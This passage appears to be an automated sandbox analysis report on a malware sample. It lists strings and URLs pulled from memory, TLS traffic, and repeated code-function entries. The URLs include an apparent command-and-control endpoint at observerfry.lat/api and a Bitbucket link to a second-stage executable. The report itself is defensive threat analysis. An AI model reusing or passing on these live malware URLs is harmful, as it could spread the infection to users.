                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605364436.0000000001441000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605364436.0000000001441000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/G%
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1869447514.0000000000D5B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1872268064.00000000013BA000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/
                Source: Yh6fS6qfTE.exe, Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013DA000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1431442535.0000000005AB1000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/api
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apic
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/api
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.10:49758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.217.18.140:443 -> 192.168.2.10:49764 version: TLS 1.2

                System Summary

                barindex
                Source: Yh6fS6qfTE.exeStatic PE information: section name:
                Source: Yh6fS6qfTE.exeStatic PE information: section name: .rsrc
                Source: Yh6fS6qfTE.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_0145A3720_3_0145A372
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeCode function: 0_3_014587AF0_3_014587AF
